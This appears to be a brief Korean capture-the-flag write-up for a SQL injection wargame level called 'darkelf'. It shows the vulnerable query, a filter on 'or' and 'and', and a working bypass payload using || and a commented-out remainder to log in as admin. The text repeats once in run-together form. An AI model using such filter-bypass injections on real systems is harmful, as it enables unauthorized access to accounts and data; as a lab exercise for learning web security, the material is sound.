Query
1
select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'
Protection
preg_match
prob문자열_.()orand
Analysis
and와or연산자 대신&&,||를 사용할 수 있다
Payload
1
?pw=' || id='admin' %23
1
select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'
prob 문자열_.()orandand와 or 연산자 대신 &&, ||를 사용할 수 있다1
?pw=' || id='admin' %23
A new version of content is available.